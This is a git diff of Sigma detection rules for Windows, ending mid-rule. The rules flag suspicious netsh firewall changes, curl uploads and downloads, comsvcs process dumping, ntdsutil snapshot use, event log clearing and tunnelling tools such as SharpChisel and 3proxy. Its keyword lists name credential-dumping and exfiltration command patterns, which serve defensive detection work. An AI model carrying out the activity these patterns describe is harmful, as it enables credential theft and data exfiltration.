a/rules/windows/process_creation/proc_creation_win_netsh_fw_add_susp_image.yml +++ b/rules/windows/process_creation/proc_creation_win_netsh_fw_add_susp_image.yml @@ -7,51 +7,52 @@ references: - https://www.virusradar.com/en/Win32_Kasidet.AD/description - https://www.hybrid-analysis.com/sample/07e789f4f2f3259e7559fdccb36e96814c2dbff872a21e1fa03de9ee377d581f?environmentId=100 date: 2020/05/25 -modified: 2022/01/07 +modified: 2022/09/13 logsource: category: process_creation product: windows detection: - selection1: - Image|endswith: '\netsh.exe' - CommandLine|contains|all: - - 'firewall' - - 'add' - - 'allowedprogram' - selection2: - Image|endswith: '\netsh.exe' - CommandLine|contains|all: - - 'advfirewall' - - 'firewall' - - 'add' - - 'rule' - - 'action=allow' - - 'program=' - susp_image: - - CommandLine|contains: - - '%TEMP%' - - ':\RECYCLER\' - - 'C:\$Recycle.bin\' - - ':\SystemVolumeInformation\' - - 'C:\Windows\Temp\' - - 'C:\Temp\' - - 'C:\Users\Public\' - - 'C:\Users\Default\' - - 'C:\Users\Desktop\' - - '\Downloads\' - - '\Temporary Internet Files\Content.Outlook\' - - '\Local Settings\Temporary Internet Files\' - - CommandLine|startswith: - - 'C:\Windows\Tasks\' - - 'C:\Windows\debug\' - - 'C:\Windows\fonts\' - - 'C:\Windows\help\' - - 'C:\Windows\drivers\' - - 'C:\Windows\addins\' - - 'C:\Windows\cursors\' - - 'C:\Windows\system32\tasks\' - - '%Public%\' - condition: (selection1 or selection2) and susp_image + selection1: + Image|endswith: '\netsh.exe' + CommandLine|contains|all: + - 'firewall' + - 'add' + - 'allowedprogram' + selection2: + Image|endswith: '\netsh.exe' + CommandLine|contains|all: + - 'advfirewall' + - 'firewall' + - 'add' + - 'rule' + - 'action=allow' + - 'program=' + susp_image: + - CommandLine|contains: + - '%TEMP%' + - '%TMP%' + - ':\RECYCLER\' + - 'C:\$Recycle.bin\' + - ':\SystemVolumeInformation\' + - 'C:\Windows\Temp\' + - 'C:\Temp\' + - 'C:\Users\Public\' + - 'C:\Users\Default\' + - 'C:\Users\Desktop\' + - '\Downloads\' + - '\Temporary Internet Files\Content.Outlook\' + - '\Local Settings\Temporary Internet Files\' + - CommandLine|startswith: + - 'C:\Windows\Tasks\' + - 'C:\Windows\debug\' + - 'C:\Windows\fonts\' + - 'C:\Windows\help\' + - 'C:\Windows\drivers\' + - 'C:\Windows\addins\' + - 'C:\Windows\cursors\' + - 'C:\Windows\system32\tasks\' + - '%Public%\' + condition: (1 of selection*) and susp_image falsepositives: - Legitimate administration level: high diff --git a/rules/windows/process_creation/proc_creation_win_netsupport.yml b/rules/windows/process_creation/proc_creation_win_netsupport.yml new file mode 100644 index 000000000..d9d99094f --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_netsupport.yml @@ -0,0 +1,27 @@ +title: Use of NetSupport Remote Access Software +id: 758ff488-18d5-4cbe-8ec4-02b6285a434f +status: experimental +description: | + An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. + These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. + Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) +references: + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md +author: frack113 +date: 2022/09/25 +logsource: + category: process_creation + product: windows +detection: + selection: + - Description: NetSupport Client Configurator + - Product: NetSupport Remote Control + - Company: NetSupport Ltd + - OriginalFileName: PCICFGUI.EXE + condition: selection +falsepositives: + - Legitimate use +level: medium +tags: + - attack.command_and_control + - attack.t1219 diff --git a/rules/windows/process_creation/proc_creation_win_susp_ntdsutil.yml b/rules/windows/process_creation/proc_creation_win_ntdsutil_usage.yml similarity index 57% rename from rules/windows/process_creation/proc_creation_win_susp_ntdsutil.yml rename to rules/windows/process_creation/proc_creation_win_ntdsutil_usage.yml index ff90db27b..312a8ba58 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_ntdsutil.yml +++ b/rules/windows/process_creation/proc_creation_win_ntdsutil_usage.yml @@ -4,19 +4,19 @@ status: test description: Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT) author: Thomas Patzke references: - - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/ntdsutil.htm + - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/ntdsutil.htm date: 2019/01/16 modified: 2022/03/11 # increased level logsource: - category: process_creation - product: windows + category: process_creation + product: windows detection: - selection: - Image|endswith: '\ntdsutil.exe' - condition: selection + selection: + Image|endswith: '\ntdsutil.exe' + condition: selection falsepositives: - - NTDS maintenance + - NTDS maintenance level: medium tags: - - attack.credential_access - - attack.t1003.003 + - attack.credential_access + - attack.t1003.003 diff --git a/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_cli.yml b/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_cli.yml index 6fe080f91..e09469b62 100644 --- a/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_cli.yml +++ b/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_cli.yml @@ -11,7 +11,7 @@ references: - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN - https://twitter.com/frack113/status/1555830623633375232 date: 2022/08/07 -modified: 2022/09/12 +modified: 2022/09/20 logsource: category: process_creation product: windows @@ -22,8 +22,9 @@ detection: - '~2\' filter: - ParentImage: - - C:\Windows\System32\Dism.exe - - C:\Windows\System32\cleanmgr.exe + - 'C:\Windows\System32\Dism.exe' + - 'C:\Windows\System32\cleanmgr.exe' + - 'C:\Program Files\GPSoftware\Directory Opus\dopus.exe' - ParentImage|endswith: - '\WebEx\WebexHost.exe' - '\thor\thor64.exe' diff --git a/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_image.yml b/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_image.yml index dae3b3927..67657f150 100644 --- a/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_image.yml +++ b/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_image.yml @@ -11,7 +11,7 @@ references: - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN - https://twitter.com/frack113/status/1555830623633375232 date: 2022/08/07 -modified: 2022/08/22 +modified: 2022/09/18 logsource: category: process_creation product: windows @@ -20,7 +20,7 @@ detection: Image|contains: - '~1\' - '~2\' - filter: + filter1: - ParentImage: - C:\Windows\System32\Dism.exe - C:\Windows\System32\cleanmgr.exe # Spawns DismHost.exe with a shortened username (if too long) @@ -30,7 +30,14 @@ detection: - Product: 'InstallShield (R)' - Description: 'InstallShield (R) Setup Engine' - Company: 'InstallShield Software Corporation' - condition: selection and not filter + filter_installers: + - Image|contains|all: + - '\AppData\' + - '\Temp\' + - Image|endswith: + - '~1\unzip.exe' + - '~1\7zG.exe' + condition: selection and not 1 of filter* falsepositives: - Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process. level: high diff --git a/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_cli.yml b/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_cli.yml index 4158116e8..3f75f2dfd 100644 --- a/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_cli.yml +++ b/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_cli.yml @@ -11,7 +11,7 @@ references: - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN - https://twitter.com/jonasLyk/status/1555914501802921984 date: 2022/08/05 -modified: 2022/08/12 +modified: 2022/09/21 logsource: category: process_creation product: windows @@ -37,9 +37,10 @@ detection: - '~2.js' - '~2.hta' filter: - ParentImage|endswith: + - ParentImage|endswith: - '\WebEx\WebexHost.exe' - '\thor\thor64.exe' + - CommandLine|contains: 'C:\xampp\vcredist\VCREDI~1.EXE' condition: selection and not filter falsepositives: - Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process. diff --git a/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_image.yml b/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_image.yml index fceefa59e..4c53992f1 100644 --- a/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_image.yml +++ b/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_image.yml @@ -11,7 +11,7 @@ references: - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN - https://twitter.com/jonasLyk/status/1555914501802921984 date: 2022/08/06 -modified: 2022/08/12 +modified: 2022/09/18 logsource: category: process_creation product: windows @@ -37,9 +37,11 @@ detection: - '~2.js' - '~2.hta' filter: - ParentImage|endswith: + - ParentImage|endswith: - '\WebEx\WebexHost.exe' - '\thor\thor64.exe' + - '-installer.exe' # e.g. C:\Users\neo\Downloads\xampp-windows-x64-8.1.6-0-VS16-installer.exe + - Image|contains: '\vcredi' condition: selection and not filter falsepositives: - Unknown diff --git a/rules/windows/process_creation/proc_creation_win_process_dump_rundll32_comsvcs.yml b/rules/windows/process_creation/proc_creation_win_process_dump_rundll32_comsvcs.yml index 4143a47ad..e2f69aae4 100644 --- a/rules/windows/process_creation/proc_creation_win_process_dump_rundll32_comsvcs.yml +++ b/rules/windows/process_creation/proc_creation_win_process_dump_rundll32_comsvcs.yml @@ -14,7 +14,7 @@ references: - https://twitter.com/Wietze/status/1542107456507203586 author: Florian Roth, Modexp, Nasreddine Bencherchali (update) date: 2020/02/18 -modified: 2022/08/04 +modified: 2022/09/21 tags: - attack.defense_evasion - attack.credential_access @@ -33,7 +33,7 @@ detection: CommandLine|contains|all: - 'comsvcs' - 'full' - Commandline|contains: + CommandLine|contains: - '24 ' - '#24' - '#+24' diff --git a/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml b/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml index ef9ededa7..ad770a245 100644 --- a/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml +++ b/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml @@ -12,13 +12,15 @@ logsource: product: windows detection: selection: - CommandLine|contains|all: + CommandLine|contains|all: - 'reg' - ' ADD ' - 'Software\Microsoft\Windows\CurrentVersion\Run' condition: selection falsepositives: - - Unknown + - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons. + - Legitimate administrator sets up autorun keys for legitimate reasons. + - Discord level: medium tags: - attack.persistence diff --git a/rules/windows/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml b/rules/windows/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml index aa0568d75..1182bd8b4 100644 --- a/rules/windows/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml +++ b/rules/windows/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml @@ -9,6 +9,7 @@ author: frack113, Nasreddine Bencherchali references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/reg-import date: 2022/08/01 +modified: 2022/09/13 logsource: category: process_creation product: windows @@ -20,6 +21,7 @@ detection: CommandLine|contains: - 'C:\Users\' - '%temp%' + - '%tmp%' - '%appdata%' - '\AppData\Local\Temp\' - 'C:\Windows\Temp\' diff --git a/rules/windows/process_creation/proc_creation_win_sharp_chisel_usage.yml b/rules/windows/process_creation/proc_creation_win_sharp_chisel_usage.yml index a28f7d2c3..adce54a59 100644 --- a/rules/windows/process_creation/proc_creation_win_sharp_chisel_usage.yml +++ b/rules/windows/process_creation/proc_creation_win_sharp_chisel_usage.yml @@ -1,5 +1,8 @@ title: SharpChisel Usage id: cf93e05e-d798-4d9e-b522-b0248dc61eaf +related: + - id: 8b0e12da-d3c3-49db-bb4f-256703f380e5 + type: similar status: experimental description: Detects usage of the Sharp Chisel via the commandline arguments author: Nasreddine Bencherchali @@ -7,26 +10,30 @@ references: - https://github.com/shantanu561993/SharpChisel - https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/ date: 2022/09/05 +modified: 2022/09/13 +tags: + - attack.command_and_control + - attack.t1090.001 logsource: category: process_creation product: windows detection: - selection_img: + selection_1_img: Image|endswith: '\SharpChisel.exe' - selection_client_server: - CommandLine|contains: - - 'exe client ' - - 'exe server ' - selection_flags: - CommandLine|contains: - - ' --socks5' - - ' --reverse' - - ' r:' - - ':127.0.0.1:' - condition: 1 of selection_* + selection_1_pe: + Product: 'SharpChisel' + # Covered by Chisel Rule + # selection_2_client_server: + # CommandLine|contains: + # - 'exe client ' + # - 'exe server ' + # selection_2_flags: + # CommandLine|contains: + # - ' --socks5' + # - ' --reverse' + # - ' r:' + # - ':127.0.0.1:' + condition: 1 of selection* falsepositives: - - Some flalse positives may occure with other tools with similar commandlines -level: medium -tags: - - attack.command_and_control - - attack.t1090.001 + - Some false positives may occure with other tools with similar commandlines +level: high diff --git a/rules/windows/process_creation/proc_creation_win_susp_3proxy_usage.yml b/rules/windows/process_creation/proc_creation_win_susp_3proxy_usage.yml new file mode 100644 index 000000000..3a35b6a6c --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_susp_3proxy_usage.yml @@ -0,0 +1,26 @@ +title: 3Proxy Usage +id: f38a82d2-fba3-4781-b549-525efbec8506 +status: experimental +description: Detects the use of 3proxy, a tiny free proxy server +author: Florian Roth +date: 2022/09/13 +references: + - https://github.com/3proxy/3proxy + - https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html +tags: + - attack.command_and_control + - attack.t1572 +logsource: + category: process_creation + product: windows +detection: + selection: + Image|endswith: '\3proxy.exe' + selection_pe: + Description: '3proxy - tiny proxy server' + selection_params: # param combos seen in the wild + CommandLine|contains: '.exe -i127.0.0.1 -p' + condition: 1 of selection +falsepositives: + - Administrative activity +level: high diff --git a/rules/windows/process_creation/proc_creation_win_susp_codepage_lookup.yml b/rules/windows/process_creation/proc_creation_win_susp_codepage_lookup.yml index fabb0e86f..3e7830ad4 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_codepage_lookup.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_codepage_lookup.yml @@ -7,7 +7,7 @@ references: - https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/ - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/chcp date: 2022/02/21 -modified: 2022/04/21 +modified: 2022/09/21 logsource: category: process_creation product: windows @@ -22,12 +22,15 @@ detection: - 'chcp' - 'chcp ' - 'chcp ' - condition: selection + filter_anaconda: + # This filter will only work with aurora agent enriched data as Sysmon EID 1 and EID 4688 from event log both do not contain GrandparentCommandLine field + GrandparentCommandLine|contains: '/c C:\ProgramData\Anaconda3' + condition: selection and not 1 of filter_* fields: - CommandLine - ParentCommandLine falsepositives: - - Unknown + - During Anaconda update the 'conda.exe' process will eventually launch the command described in the detection section level: high tags: - attack.discovery diff --git a/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml b/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml index 7815daee9..67f7c265e 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml @@ -9,7 +9,7 @@ references: - https://github.com/pr0xylife/Qakbot/blob/4f0795d79dabee5bc9dd69f17a626b48852e7869/Qakbot_AA_23.06.2022.txt - https://www.volexity.com/blog/2022/07/28/sharptongue-deploys-clever-mail-stealing-browser-extension-sharpext/ date: 2020/07/03 -modified: 2022/07/28 +modified: 2022/09/20 logsource: category: process_creation product: windows @@ -24,6 +24,7 @@ detection: - '\Temp\' - '%AppData%' - '%Temp%' + - '%tmp%' - '%Public%' - '\Desktop\' selection_susp_extensions: @@ -40,7 +41,16 @@ detection: - ' -O' # covers the alias for --remote-name and --output - '--remote-name' - '--output' - condition: selection_curl and 1 of selection_susp* + filter_git_windows: + ParentImage: 'C:\Program Files\Git\usr\bin\sh.exe' + ParentCommandLine|contains|all: + - 'git-update-git-for-windows' + - '--quiet --gui' + Image: 'C:\Program Files\Git\mingw64\bin\curl.exe' + CommandLine|contains|all: + - '--silent --show-error --output ' + - 'gfw-httpget-' + condition: selection_curl and 1 of selection_susp* and not 1 of filter_* fields: - CommandLine - ParentCommandLine diff --git a/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml b/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml index 20ffcba7a..f8ae829c9 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml @@ -9,7 +9,7 @@ references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file - https://curl.se/docs/manpage.html date: 2020/07/03 -modified: 2022/01/22 +modified: 2022/09/15 logsource: category: process_creation product: windows @@ -20,11 +20,12 @@ detection: selection_cli: CommandLine|contains: - ' -F ' - - ' --form ' + - ' --form' # Also covers the "--form-string" - ' -T ' - ' --upload-file ' - ' -d ' - ' --data ' + - ' --data-' # For flags like: "--data-ascii", "--data-binary", "--data-raw", "--data-urlencode" condition: all of selection* fields: - CommandLine diff --git a/rules/windows/process_creation/proc_creation_win_susp_direct_asep_reg_keys_modification.yml b/rules/windows/process_creation/proc_creation_win_susp_direct_asep_reg_keys_modification.yml index 421e0f538..fa812d78b 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_direct_asep_reg_keys_modification.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_direct_asep_reg_keys_modification.yml @@ -29,6 +29,7 @@ fields: falsepositives: - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons. - Legitimate administrator sets up autorun keys for legitimate reasons. + - Discord level: medium tags: - attack.persistence diff --git a/rules/windows/process_creation/proc_creation_win_susp_ditsnap.yml b/rules/windows/process_creation/proc_creation_win_susp_ditsnap.yml index 780851390..e6c83822a 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_ditsnap.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_ditsnap.yml @@ -4,22 +4,21 @@ status: test description: Detects the use of Ditsnap tool. Seems to be a tool for ransomware groups. author: 'Furkan Caliskan (@caliskanfurkan_)' references: - - https://thedfirreport.com/2020/06/21/snatch-ransomware/ - - https://github.com/yosqueoy/ditsnap + - https://thedfirreport.com/2020/06/21/snatch-ransomware/ + - https://github.com/yosqueoy/ditsnap date: 2020/07/04 modified: 2021/11/27 logsource: - category: process_creation - product: windows + category: process_creation + product: windows detection: - selection: - Image|endswith: '\ditsnap.exe' - selection2: - CommandLine|contains: 'ditsnap.exe' - condition: selection or selection2 + selection: + - Image|endswith: '\ditsnap.exe' + - CommandLine|contains: 'ditsnap.exe' + condition: selection falsepositives: - - Legitimate admin usage + - Legitimate admin usage level: high tags: - - attack.credential_access - - attack.t1003.003 + - attack.credential_access + - attack.t1003.003 diff --git a/rules/windows/process_creation/proc_creation_win_susp_eventlog_clear.yml b/rules/windows/process_creation/proc_creation_win_susp_eventlog_clear.yml index da3d019ac..322528935 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_eventlog_clear.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_eventlog_clear.yml @@ -7,7 +7,7 @@ references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md - https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html date: 2019/09/26 -modified: 2022/07/14 +modified: 2022/09/12 logsource: category: process_creation product: windows @@ -15,18 +15,19 @@ detection: selection_wevtutil: Image|endswith: '\wevtutil.exe' CommandLine|contains: - - 'clear-log' # clears specified log - - ' cl ' # short version of 'clear-log' - - 'set-log' # modifies config of specified log. could be uset to set it to a tiny size - - ' sl ' # short version of 'set-log' + - 'clear-log ' # clears specified log + - ' cl ' # short version of 'clear-log' + - 'set-log ' # modifies config of specified log. could be uset to set it to a tiny size + - ' sl ' # short version of 'set-log' selection_other_ps: Image|endswith: - '\powershell.exe' - '\pwsh.exe' CommandLine|contains: - - 'Clear-EventLog' - - 'Remove-EventLog' - - 'Limit-EventLog' + - 'Clear-EventLog ' + - 'Remove-EventLog ' + - 'Limit-EventLog ' + - 'Clear-WinEvent ' selection_other_wmic: Image|endswith: '\wmic.exe' CommandLine|contains: ' ClearEventLog ' diff --git a/rules/windows/process_creation/proc_creation_win_susp_explorer_break_proctree.yml b/rules/windows/process_creation/proc_creation_win_susp_explorer_break_proctree.yml index 880093006..64bd7a5e7 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_explorer_break_proctree.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_explorer_break_proctree.yml @@ -2,21 +2,26 @@ title: Explorer Process Tree Break id: 949f1ffb-6e85-4f00-ae1e-c3c5b190d605 status: test description: Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries, which is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from "svchost" -author: Florian Roth, Nasreddine Bencherchali +author: 'Florian Roth, Nasreddine Bencherchali, @gott_cyber' references: - https://twitter.com/CyberRaiju/status/1273597319322058752 - https://twitter.com/bohops/status/1276357235954909188?s=12 - https://twitter.com/nas_bench/status/1535322450858233858 - https://securityboulevard.com/2019/09/deobfuscating-ostap-trickbots-34000-line-javascript-downloader/ date: 2019/06/29 -modified: 2022/06/14 +modified: 2022/09/20 logsource: category: process_creation product: windows detection: selection: # See CLSID_SeparateMultipleProcessExplorerHost in the registry for reference - CommandLine|contains: '/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b}' + - CommandLine|contains: '/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b}' # This will catch, the new explorer spawning which indicates a process/tree break. But you won't be able to catch the executing process. For that you need historical data + # There is exists almost infinite possibilities to spawn from explorer. The "/root" flag is just an example + # It's better to have the ability to look at the process tree and look for explorer processes with "weird" flags to be able to catch this technique. + - CommandLine|contains|all: + - 'explorer.exe' + - ' /root,' condition: selection falsepositives: - Unknown how many legitimate software products use that method diff --git a/rules/windows/process_creation/proc_creation_win_susp_gup_execution.yml b/rules/windows/process_creation/proc_creation_win_susp_gup_execution.yml index a0305eede..ac7d75772 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_gup_execution.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_gup_execution.yml @@ -6,6 +6,7 @@ author: Nasreddine Bencherchali references: - https://twitter.com/nas_bench/status/1535322445439180803 date: 2022/06/10 +modified: 2022/09/18 logsource: category: process_creation product: windows @@ -16,9 +17,13 @@ detection: filter: Image|endswith: '\explorer.exe' CommandLine|contains: '\Notepad++\notepad++.exe' - condition: selection and not filter + filter_parent: + ParentImage|contains: '\Notepad++\updater\' + filter_null: + CommandLine: null + condition: selection and not 1 of filter* falsepositives: - Other parent binaries using GUP not currently identified -level: high +level: medium tags: - attack.execution diff --git a/rules/windows/process_creation/proc_creation_win_susp_image_missing.yml b/rules/windows/process_creation/proc_creation_win_susp_image_missing.yml index 05d19eed8..f01b13a1f 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_image_missing.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_image_missing.yml @@ -4,7 +4,7 @@ status: experimental description: Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process) author: Max Altgelt date: 2021/12/09 -modified: 2022/03/08 +modified: 2022/09/20 references: - https://pentestlaboratories.com/2021/12/08/process-ghosting/ tags: @@ -25,9 +25,11 @@ detection: - Image: - 'Registry' - 'MemCompression' + - 'vmmem' - CommandLine: - 'Registry' - 'MemCompression' + - 'vmmem' condition: not image_absolute_path and not 1 of filter* falsepositives: - Unknown diff --git a/rules/windows/process_creation/proc_creation_win_susp_invoke_webrequest_download.yml b/rules/windows/process_creation/proc_creation_win_susp_invoke_webrequest_download.yml index be17123fc..cddb6c356 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_invoke_webrequest_download.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_invoke_webrequest_download.yml @@ -9,6 +9,7 @@ author: Nasreddine Bencherchali references: - https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/ date: 2022/08/02 +modified: 2022/09/13 logsource: category: process_creation product: windows @@ -34,6 +35,7 @@ detection: - '\Temp\' - '%AppData%' - '%Temp%' + - '%tmp%' - '%Public%' - '\Desktop\' - 'C:\Windows\' diff --git a/rules/windows/process_creation/proc_creation_win_susp_mofcomp_execution.yml b/rules/windows/process_creation/proc_creation_win_susp_mofcomp_execution.yml index 07b7eb8f6..8d625c51f 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_mofcomp_execution.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_mofcomp_execution.yml @@ -11,7 +11,7 @@ references: - https://github.com/The-DFIR-Report/Sigma-Rules/blob/75260568a7ffe61b2458ca05f6f25914efb44337/win_mofcomp_execution.yml - https://docs.microsoft.com/en-us/windows/win32/wmisdk/mofcomp date: 2022/07/12 -modified: 2022/07/14 +modified: 2022/09/13 logsource: category: process_creation product: windows @@ -31,6 +31,7 @@ detection: - '\Users\Public\' - '\WINDOWS\Temp\' - '%temp%' + - '%tmp%' - '%appdata%' condition: all of selection_* falsepositives: diff --git a/rules/windows/process_creation/proc_creation_win_susp_non_exe_image.yml b/rules/windows/process_creation/proc_creation_win_susp_non_exe_image.yml index d89582a80..e8b55f8fe 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_non_exe_image.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_non_exe_image.yml @@ -4,7 +4,7 @@ status: experimental description: Checks whether the image specified in a process creation event doesn't refer to an .exe file (caused by process ghosting or other unorthodox methods to start a process) author: Max Altgelt date: 2021/12/09 -modified: 2022/06/20 +modified: 2022/09/20 references: - https://pentestlaboratories.com/2021/12/08/process-ghosting/ tags: @@ -23,6 +23,7 @@ detection: Image: - 'Registry' - 'MemCompression' + - 'vmmem' filter_empty: Image: - '-' diff --git a/rules/windows/process_creation/proc_creation_win_susp_ntdsutil_usage.yml b/rules/windows/process_creation/proc_creation_win_susp_ntdsutil_usage.yml new file mode 100644 index 000000000..cff53a918 --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_susp_ntdsutil_usage.yml @@ -0,0 +1,38 @@ +title: Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe) +id: a58353df-af43-4753-bad0-cd83ef35eef5 +related: + - id: 2afafd61-6aae-4df4-baed-139fa1f4c345 + type: derived +status: experimental +description: Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots...etc. +author: Nasreddine Bencherchali +references: + - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731620(v=ws.11) + - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments +date: 2022/09/14 +logsource: + category: process_creation + product: windows +detection: + selection_img: + - Image|endswith: '\ntdsutil.exe' + - OriginalFileName: 'ntdsutil.exe' + selection_cli: + - CommandLine|contains|all: + - 'snapshot' + - 'mount ' # mounts a specific snapshot - Ex: ntdsutil snapshot "mount c2b3e2c6-1ffb-4625-ba8e-3503c27a9fcb" quit quit + - CommandLine|contains|all: + # This offers more coverage to the "selection_oneliner_1" case in rule 8bc64091-6875-4881-aaf9-7bd25b5dda08 + # The shorest form of "activate" can "ac". But "act", "acti"...etc are also valid forms + # Same case with the "instance" flag + - 'ac' + - ' i' + - ' ntds' + condition: all of selection_* +falsepositives: + - Legitimate usage to restore snapshots + - Legitimate admin activity +level: medium +tags: + - attack.credential_access + - attack.t1003.003 diff --git a/rules/windows/process_creation/proc_creation_win_susp_powershell_cmd_patterns.yml b/rules/windows/process_creation/proc_creation_win_susp_powershell_cmd_patterns.yml index 115d72cea..d1a4a1c0e 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_powershell_cmd_patterns.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_powershell_cmd_patterns.yml @@ -6,7 +6,7 @@ author: Florian Roth references: - https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/ date: 2022/05/24 -modified: 2022/07/14 +modified: 2022/09/26 tags: - attack.execution - attack.t1059.001 @@ -32,7 +32,11 @@ detection: - ' IAB' - ' PAA' - ' aQBlAHgA' - condition: encoded and selection + filter: + ParentImage|contains: + - 'C:\Packages\Plugins\Microsoft.GuestConfiguration.ConfigurationforWindows\' + - '\gc_worker.exe' + condition: encoded and selection and not filter falsepositives: - Other tools that work with encoded scripts in the command line instead of script files level: high diff --git a/rules/windows/process_creation/proc_creation_win_susp_powershell_encode.yml b/rules/windows/process_creation/proc_creation_win_susp_powershell_encode.yml index f6ab8837d..42a2a1995 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_powershell_encode.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_powershell_encode.yml @@ -8,7 +8,7 @@ references: - https://unit42.paloaltonetworks.com/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/ - https://mikefrobbins.com/2017/06/15/simple-obfuscation-with-powershell-using-base64-encoding/ date: 2022/01/02 -modified: 2022/07/14 +modified: 2022/09/26 logsource: category: process_creation product: windows @@ -25,7 +25,11 @@ detection: - ' -ec ' filter: CommandLine|contains: ' -Encoding ' - condition: selection and not filter + filter_azure: + ParentImage|contains: + - 